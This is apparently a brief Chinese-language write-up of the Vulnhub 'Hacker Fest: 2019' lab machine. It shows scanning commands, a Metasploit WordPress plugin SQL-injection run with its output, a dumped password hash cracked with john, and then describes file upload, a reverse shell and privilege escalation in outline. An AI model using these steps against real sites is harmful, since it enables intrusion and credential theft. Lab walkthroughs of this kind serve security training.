Hacker Fest: 2019 Vulnhub Walkthrough

靶機地址：

https://www.vulnhub.com/entry/hacker-fest-2019,378/

主機掃描：

 

FTP嘗試匿名登陸

 

應該是WordPress的站點

進行目錄掃描：

python3 dirsearch.py http://10.10.203.17/ -e html,json,php

 

此外還有一個phpmyadmin

http://10.10.203.17/phpmyadmin/index.php

使用wpscan掃描檢測插件漏洞

wpscan --url http://10.10.203.17

 

msf5 > use auxiliary/admin/http/wp_google_maps_sqli

msf5 auxiliary(admin/http/wp_google_maps_sqli) > set rhosts 10.10.203.17
rhosts => 10.10.203.17

msf5 auxiliary(admin/http/wp_google_maps_sqli) > exploit
[*] Running module against 10.10.203.17

[*] 10.10.203.17:80 - Trying to retrieve the wp_users table...
[+] Credentials saved in: /root/.msf4/loot/20191014174707_default_10.10.203.17_wp_google_maps.j_470411.bin
[+] 10.10.203.17:80 - Found webmaster $P$BsqOdiLTcye6AS1ofreys4GzRlRvSr1 webmaster@none.local
[*] Auxiliary module execution completed
msf5 auxiliary(admin/http/wp_google_maps_sqli) >

 

密碼hash破解

john --wordlist=/usr/share/wordlists/rockyou.txt hash

kittykat1

 

http://10.10.203.17/wp-admin/

安裝ubh插件，進行上傳文件

 

本地監聽，訪問反彈shell

這裏有兩個思路：

1是經過webshell切換到webmaster用戶

2是直接經過遠程ssh登陸系統

 

進行提權

 

OVER!